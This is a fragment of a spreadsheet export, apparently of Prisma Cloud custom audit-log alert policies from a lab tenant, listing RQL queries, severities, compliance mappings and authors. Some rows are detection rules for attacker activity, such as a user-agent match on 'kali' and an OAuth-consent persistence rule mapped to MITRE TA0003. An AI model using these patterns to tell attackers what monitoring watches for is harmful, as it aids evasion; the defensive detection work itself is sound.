        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2620" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:10</t>
        </is>
      </c>
      <c r="AC2620" t="inlineStr"/>
      <c r="AD2620" t="b">
        <v>1</v>
      </c>
      <c r="AE2620" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2620" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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0" t="inlineStr">
        <is>
          <t>43773730-50ff-4c91-abf6-4fa52c8118a9</t>
        </is>
      </c>
      <c r="AI2620" t="inlineStr">
        <is>
          <t>59f721fb-b3ac-4bb7-b2f1-01aad63c8b28</t>
        </is>
      </c>
      <c r="AJ2620" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2620" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2621">
      <c r="A2621" t="inlineStr">
        <is>
          <t>CCPA 2018</t>
        </is>
      </c>
      <c r="B2621" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2621" s="2" t="inlineStr"/>
      <c r="D2621" t="inlineStr"/>
      <c r="E2621" t="inlineStr"/>
      <c r="F2621" t="inlineStr"/>
      <c r="G2621" t="b">
        <v>0</v>
      </c>
      <c r="H26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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2621" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2621" t="inlineStr">
        <is>
          <t>failed-audit-sync</t>
        </is>
      </c>
      <c r="L2621" t="inlineStr"/>
      <c r="M2621" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2621" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2621" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2621" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2621" t="inlineStr">
        <is>
          <t>1798.105</t>
        </is>
      </c>
      <c r="R2621" t="inlineStr">
        <is>
          <t>1798.105(b)</t>
        </is>
      </c>
      <c r="S2621" t="inlineStr">
        <is>
          <t>Custom</t>
        </is>
      </c>
      <c r="T2621" t="b">
        <v>0</v>
      </c>
      <c r="U2621" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2621" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2621" t="inlineStr"/>
      <c r="X2621" t="inlineStr"/>
      <c r="Y2621" t="inlineStr"/>
      <c r="Z2621" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation IN ('AttachGroupPolicy', 'AttachRolePolicy', 'DeleteGroupPolicy', 'DeleteKeyPair', 'DeleteLogGroup')</t>
        </is>
      </c>
      <c r="AA2621" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2621" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:33</t>
        </is>
      </c>
      <c r="AC2621" t="inlineStr"/>
      <c r="AD2621" t="b">
        <v>0</v>
      </c>
      <c r="AE2621" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2621" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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1" t="inlineStr">
        <is>
          <t>28dee53d-ef4a-4cc8-87cf-62043fd854eb</t>
        </is>
      </c>
      <c r="AI2621" t="inlineStr">
        <is>
          <t>13e4f3c8-e6b5-47cb-95f6-ba1ab7e81796</t>
        </is>
      </c>
      <c r="AJ2621" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2621" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2622">
      <c r="A2622" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), DM_TEST</t>
        </is>
      </c>
      <c r="B2622" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2622" s="2" t="inlineStr"/>
      <c r="D2622" t="inlineStr"/>
      <c r="E2622" t="inlineStr"/>
      <c r="F2622" t="inlineStr"/>
      <c r="G2622" t="b">
        <v>0</v>
      </c>
      <c r="H26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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2622" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2622" t="inlineStr">
        <is>
          <t>Stella audit test1</t>
        </is>
      </c>
      <c r="L2622" t="inlineStr"/>
      <c r="M2622" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2622" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2622" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2622" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2622" t="inlineStr">
        <is>
          <t>Identity</t>
        </is>
      </c>
      <c r="R2622" t="inlineStr">
        <is>
          <t>SSH Traffic for ingress and egress</t>
        </is>
      </c>
      <c r="S2622" t="inlineStr"/>
      <c r="T2622" t="b">
        <v>0</v>
      </c>
      <c r="U2622" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2622" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2622" t="inlineStr"/>
      <c r="X2622" t="inlineStr"/>
      <c r="Y2622" t="inlineStr"/>
      <c r="Z2622" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.service = 'amazonmq.amazonaws.com'</t>
        </is>
      </c>
      <c r="AA2622" t="inlineStr">
        <is>
          <t>Prakash Kumar</t>
        </is>
      </c>
      <c r="AB2622" t="inlineStr">
        <is>
          <t>2023-08-29 12:40:33</t>
        </is>
      </c>
      <c r="AC2622" t="inlineStr"/>
      <c r="AD2622" t="b">
        <v>0</v>
      </c>
      <c r="AE2622" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2622" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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2" t="inlineStr">
        <is>
          <t>e0ae041b-884a-4bce-bc37-5bb9b92ed7f3</t>
        </is>
      </c>
      <c r="AI2622" t="inlineStr">
        <is>
          <t>ab238091-5d92-43b3-ba27-80222ed1668d</t>
        </is>
      </c>
      <c r="AJ2622" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2622" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2623">
      <c r="A2623" t="inlineStr"/>
      <c r="B2623" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2623" s="2" t="inlineStr"/>
      <c r="D2623" t="n">
        <v>2</v>
      </c>
      <c r="E2623" t="n">
        <v>1</v>
      </c>
      <c r="F2623" t="n">
        <v>0</v>
      </c>
      <c r="G2623" t="b">
        <v>1</v>
      </c>
      <c r="H26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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2623" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2623" t="inlineStr">
        <is>
          <t>Azure Subscription Created</t>
        </is>
      </c>
      <c r="L2623" t="inlineStr"/>
      <c r="M2623" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2623" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2623" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2623" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2623" t="inlineStr"/>
      <c r="R2623" t="inlineStr"/>
      <c r="S2623" t="inlineStr">
        <is>
          <t>Custom</t>
        </is>
      </c>
      <c r="T2623" t="b">
        <v>0</v>
      </c>
      <c r="U2623" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2623" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2623" t="inlineStr"/>
      <c r="X2623" t="inlineStr"/>
      <c r="Y2623" t="inlineStr"/>
      <c r="Z2623" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation matches 'create subscription'</t>
        </is>
      </c>
      <c r="AA2623" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2623" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:33</t>
        </is>
      </c>
      <c r="AC2623" t="inlineStr"/>
      <c r="AD2623" t="b">
        <v>0</v>
      </c>
      <c r="AE2623" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2623" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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3" t="inlineStr">
        <is>
          <t>47564621-697c-4332-9bea-65fb9318b114</t>
        </is>
      </c>
      <c r="AI2623" t="inlineStr">
        <is>
          <t>2f7827f5-6bf4-4e24-a93a-8712550121bd</t>
        </is>
      </c>
      <c r="AJ2623" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2623" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2624">
      <c r="A2624" t="inlineStr">
        <is>
          <t>Brazilian Data Protection Law (LGPD)</t>
        </is>
      </c>
      <c r="B2624" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2624" s="2" t="inlineStr"/>
      <c r="D2624" t="inlineStr"/>
      <c r="E2624" t="inlineStr"/>
      <c r="F2624" t="inlineStr"/>
      <c r="G2624" t="b">
        <v>0</v>
      </c>
      <c r="H26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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2624" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2624" t="inlineStr">
        <is>
          <t>test_qa_audit</t>
        </is>
      </c>
      <c r="L2624" t="inlineStr"/>
      <c r="M2624" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2624" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2624" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2624" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2624" t="inlineStr">
        <is>
          <t>Chapter-1</t>
        </is>
      </c>
      <c r="R2624" t="inlineStr">
        <is>
          <t>Article 1</t>
        </is>
      </c>
      <c r="S2624" t="inlineStr"/>
      <c r="T2624" t="b">
        <v>0</v>
      </c>
      <c r="U2624" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2624" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2624" t="inlineStr"/>
      <c r="X2624" t="inlineStr"/>
      <c r="Y2624" t="inlineStr"/>
      <c r="Z2624" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.service = 's3.amazonaws.com' AND json.rule = $.userAgent contains 'kali'</t>
        </is>
      </c>
      <c r="AA2624" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2624" t="inlineStr">
        <is>
          <t>2024-09-13 16:53:53</t>
        </is>
      </c>
      <c r="AC2624" t="inlineStr"/>
      <c r="AD2624" t="b">
        <v>0</v>
      </c>
      <c r="AE2624" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2624" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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4" t="inlineStr">
        <is>
          <t>9ef8ae0b-8e10-4048-8f9a-5cbb91bd307c</t>
        </is>
      </c>
      <c r="AI2624" t="inlineStr">
        <is>
          <t>80c9dff1-69d2-42fb-aa34-9209634778e9</t>
        </is>
      </c>
      <c r="AJ2624" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2624" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2625">
      <c r="A2625" t="inlineStr"/>
      <c r="B2625" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2625" s="2" t="inlineStr"/>
      <c r="D2625" t="inlineStr"/>
      <c r="E2625" t="inlineStr"/>
      <c r="F2625" t="inlineStr"/>
      <c r="G2625" t="b">
        <v>1</v>
      </c>
      <c r="H26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25" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2625" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2625" t="inlineStr">
        <is>
          <t>new  ECR Repo has been created</t>
        </is>
      </c>
      <c r="L2625" t="inlineStr"/>
      <c r="M2625" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2625" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2625" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2625" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2625" t="inlineStr"/>
      <c r="R2625" t="inlineStr"/>
      <c r="S2625" t="inlineStr"/>
      <c r="T2625" t="b">
        <v>0</v>
      </c>
      <c r="U2625" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2625" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2625" t="inlineStr"/>
      <c r="X2625" t="inlineStr"/>
      <c r="Y2625" t="inlineStr"/>
      <c r="Z2625" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.service = 'ecr.amazonaws.com'</t>
        </is>
      </c>
      <c r="AA2625" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2625" t="inlineStr">
        <is>
          <t>2024-09-19 15:48:22</t>
        </is>
      </c>
      <c r="AC2625" t="inlineStr"/>
      <c r="AD2625" t="b">
        <v>0</v>
      </c>
      <c r="AE2625" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2625" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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25" t="inlineStr">
        <is>
          <t>917d90fa-49f7-40c6-b283-453d7c548e7e</t>
        </is>
      </c>
      <c r="AI2625" t="inlineStr">
        <is>
          <t>873ee1ba-f7d4-4517-8b8d-c5f8cdd865df</t>
        </is>
      </c>
      <c r="AJ2625" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2625" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2626">
      <c r="A2626" t="inlineStr">
        <is>
          <t>AWS Well-Architected Framework</t>
        </is>
      </c>
      <c r="B2626" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2626" s="2" t="inlineStr"/>
      <c r="D2626" t="inlineStr"/>
      <c r="E2626" t="inlineStr"/>
      <c r="F2626" t="inlineStr"/>
      <c r="G2626" t="b">
        <v>0</v>
      </c>
      <c r="H26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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2626" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2626" t="inlineStr">
        <is>
          <t>new</t>
        </is>
      </c>
      <c r="L2626" t="inlineStr"/>
      <c r="M2626" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2626" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2626" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2626" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2626" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="R2626" t="inlineStr">
        <is>
          <t>Detection</t>
        </is>
      </c>
      <c r="S2626" t="inlineStr"/>
      <c r="T2626" t="b">
        <v>0</v>
      </c>
      <c r="U2626" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2626" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2626" t="inlineStr"/>
      <c r="X2626" t="inlineStr"/>
      <c r="Y2626" t="inlineStr"/>
      <c r="Z2626" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.account = 'kfirdaus-AWS-ACCT'</t>
        </is>
      </c>
      <c r="AA2626" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2626" t="inlineStr">
        <is>
          <t>2024-09-13 17:19:38</t>
        </is>
      </c>
      <c r="AC2626" t="inlineStr"/>
      <c r="AD2626" t="b">
        <v>0</v>
      </c>
      <c r="AE2626" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2626" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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6" t="inlineStr">
        <is>
          <t>ed6018d1-4834-4ff8-8fe4-2c53ed7accd1</t>
        </is>
      </c>
      <c r="AI2626" t="inlineStr">
        <is>
          <t>19af59be-a75e-48e8-887a-3ba85f950de9</t>
        </is>
      </c>
      <c r="AJ2626" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2626" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2627">
      <c r="A2627" t="inlineStr"/>
      <c r="B2627" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2627" s="2" t="inlineStr"/>
      <c r="D2627" t="inlineStr"/>
      <c r="E2627" t="inlineStr"/>
      <c r="F2627" t="inlineStr"/>
      <c r="G2627" t="b">
        <v>0</v>
      </c>
      <c r="H26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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2627" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2627" t="inlineStr">
        <is>
          <t>Grab_me_logs</t>
        </is>
      </c>
      <c r="L2627" t="inlineStr"/>
      <c r="M2627" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2627" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2627" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2627" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2627" t="inlineStr"/>
      <c r="R2627" t="inlineStr"/>
      <c r="S2627" t="inlineStr"/>
      <c r="T2627" t="b">
        <v>0</v>
      </c>
      <c r="U2627" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2627" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2627" t="inlineStr"/>
      <c r="X2627" t="inlineStr"/>
      <c r="Y2627" t="inlineStr"/>
      <c r="Z2627" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation IN ('CreateCryptoKey','DestroyCryptoKeyVersion','v1.compute.disks.createSnapshot')</t>
        </is>
      </c>
      <c r="AA2627" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2627" t="inlineStr">
        <is>
          <t>2024-09-13 16:52:29</t>
        </is>
      </c>
      <c r="AC2627" t="inlineStr"/>
      <c r="AD2627" t="b">
        <v>0</v>
      </c>
      <c r="AE2627" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2627" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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7" t="inlineStr">
        <is>
          <t>fde68079-b505-43ac-ac69-e37f36546b87</t>
        </is>
      </c>
      <c r="AI2627" t="inlineStr">
        <is>
          <t>6e28bce0-cacf-4bd4-aeaa-b81cf4018b57</t>
        </is>
      </c>
      <c r="AJ2627" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2627" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2628">
      <c r="A2628" t="inlineStr">
        <is>
          <t>NIST 800-171 Rev1</t>
        </is>
      </c>
      <c r="B2628" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2628" s="2" t="inlineStr"/>
      <c r="D2628" t="inlineStr"/>
      <c r="E2628" t="inlineStr"/>
      <c r="F2628" t="inlineStr"/>
      <c r="G2628" t="b">
        <v>0</v>
      </c>
      <c r="H26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28" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2628" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2628" t="inlineStr">
        <is>
          <t>List for root</t>
        </is>
      </c>
      <c r="L2628" t="inlineStr"/>
      <c r="M2628" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2628" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2628" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2628" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2628" t="inlineStr">
        <is>
          <t>3.14</t>
        </is>
      </c>
      <c r="R2628" t="inlineStr">
        <is>
          <t>3.14.6</t>
        </is>
      </c>
      <c r="S2628" t="inlineStr"/>
      <c r="T2628" t="b">
        <v>0</v>
      </c>
      <c r="U2628" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2628" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2628" t="inlineStr"/>
      <c r="X2628" t="inlineStr"/>
      <c r="Y2628" t="inlineStr"/>
      <c r="Z2628" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.type = 'azure' AND operation IN ( 'CreateVpc' , 'DeleteVpc' ) AND user = 'root'</t>
        </is>
      </c>
      <c r="AA2628" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2628" t="inlineStr">
        <is>
          <t>2024-09-13 17:20:38</t>
        </is>
      </c>
      <c r="AC2628" t="inlineStr"/>
      <c r="AD2628" t="b">
        <v>0</v>
      </c>
      <c r="AE2628" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2628" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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28" t="inlineStr">
        <is>
          <t>3e9f52cf-8e92-40ff-8e81-99fb1b81466d</t>
        </is>
      </c>
      <c r="AI2628" t="inlineStr">
        <is>
          <t>e0ab19ee-1c9d-49b9-9cca-cf8d2e91102f</t>
        </is>
      </c>
      <c r="AJ2628" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2628" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2629">
      <c r="A2629" t="inlineStr">
        <is>
          <t>Matt's ATT&amp;ACK</t>
        </is>
      </c>
      <c r="B2629" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2629" s="2" t="inlineStr"/>
      <c r="D2629" t="inlineStr"/>
      <c r="E2629" t="inlineStr"/>
      <c r="F2629" t="inlineStr"/>
      <c r="G2629" t="b">
        <v>1</v>
      </c>
      <c r="H2629" t="inlineStr">
        <is>
          <t>BG-AH-Email-Test, BPtestTag, Breach and Persistence maneuvers,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29" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2629" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2629" t="inlineStr">
        <is>
          <t>Breach and Persistence maneuvers</t>
        </is>
      </c>
      <c r="L2629" t="inlineStr"/>
      <c r="M2629" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2629" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2629" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2629" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2629" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R2629" t="inlineStr">
        <is>
          <t>T1098 - Account Manipulation (TA0003)</t>
        </is>
      </c>
      <c r="S2629" t="inlineStr">
        <is>
          <t>High Risk</t>
        </is>
      </c>
      <c r="T2629" t="b">
        <v>0</v>
      </c>
      <c r="U2629" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2629" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2629" t="inlineStr">
        <is>
          <t>This policy links to T1608.003 within Mitre v12 , TA0003  section. Reports a potential breach where an attacker performs OAuth2 consent grant activities and Enterprise app deployments to achieve persistence.</t>
        </is>
      </c>
      <c r="X2629" t="inlineStr">
        <is>
          <t>1.Immediately terminate resources that were deployed outside of working hours, in an unauthorized manner and from an IP different from the commonly used.
2.Reset the compromised user's credentials, and have them re register their MFA device.
3.If the user exists in AAD, please check if there's an additional MFA device, different from the user's.</t>
        </is>
      </c>
      <c r="Y2629" t="inlineStr"/>
      <c r="Z2629" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation IN ('GrantConsent', 'AddServicePrincipal','changePassword','EnableMFADevice') AND json.rule = $.responseElements.application.DisplayName contains 'OAuth'</t>
        </is>
      </c>
      <c r="AA2629" t="inlineStr">
        <is>
          <t>Matias Keib</t>
        </is>
      </c>
      <c r="AB2629" t="inlineStr">
        <is>
          <t>2024-10-17 21:15:22</t>
        </is>
      </c>
      <c r="AC2629" t="inlineStr"/>
      <c r="AD2629" t="b">
        <v>0</v>
      </c>
      <c r="AE2629" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2629" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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Breach and Persistence maneuvers - Notifications:email,splunk, AccountGroups:Matt's GCP Account Group,Matt's Azure Account group;,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29" t="inlineStr">
        <is>
          <t>127ecfd7-6bc8-41c0-9239-51debf04271a</t>
        </is>
      </c>
      <c r="AI2629" t="inlineStr">
        <is>
          <t>4fac2b9a-e56d-42f5-b5ed-a12b8c232d17</t>
        </is>
      </c>
      <c r="AJ2629" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2629" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2630">
      <c r="A2630" t="inlineStr">
        <is>
          <t>APRA (CPS 234) Information Security</t>
        </is>
      </c>
      <c r="B2630" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2630" s="2" t="inlineStr"/>
      <c r="D2630" t="inlineStr"/>
      <c r="E2630" t="inlineStr"/>
      <c r="F2630" t="inlineStr"/>
      <c r="G2630" t="b">
        <v>0</v>
      </c>
      <c r="H26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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2630" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2630" t="inlineStr">
        <is>
          <t>test single add</t>
        </is>
      </c>
      <c r="L2630" t="inlineStr"/>
      <c r="M2630" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2630" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2630" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2630" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2630" t="inlineStr">
        <is>
          <t>Roles and responsibilities</t>
        </is>
      </c>
      <c r="R2630" t="inlineStr">
        <is>
          <t>CPS234-13</t>
        </is>
      </c>
      <c r="S2630" t="inlineStr"/>
      <c r="T2630" t="b">
        <v>0</v>
      </c>
      <c r="U2630" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2630" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2630" t="inlineStr">
        <is>
          <t>asdasdsd</t>
        </is>
      </c>
      <c r="X2630" t="inlineStr"/>
      <c r="Y2630" t="inlineStr"/>
      <c r="Z2630" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation IN ( 'GetBucketWebsite', 'PutBucketWebsite', 'DeleteBucketWebsite')</t>
        </is>
      </c>
      <c r="AA2630" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2630" t="inlineStr">
        <is>
          <t>2024-09-13 16:55:12</t>
        </is>
      </c>
